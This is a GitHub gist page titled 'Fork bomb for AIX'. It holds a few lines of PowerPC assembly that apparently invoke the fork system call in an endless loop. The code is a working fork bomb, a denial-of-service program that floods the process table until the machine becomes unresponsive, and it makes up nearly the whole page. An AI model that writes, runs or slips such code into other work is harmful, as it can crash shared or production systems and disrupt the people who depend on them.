Skip to content

Instantly share code, notes, and snippets.

@Low-power
Created February 22, 2022 05:57
Embed
What would you like to do?
Fork bomb for AIX
.text
.global .__start
.__start:
bl _start
_start:
li r2, 5
crorc cr6, cr6, cr6
sc
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment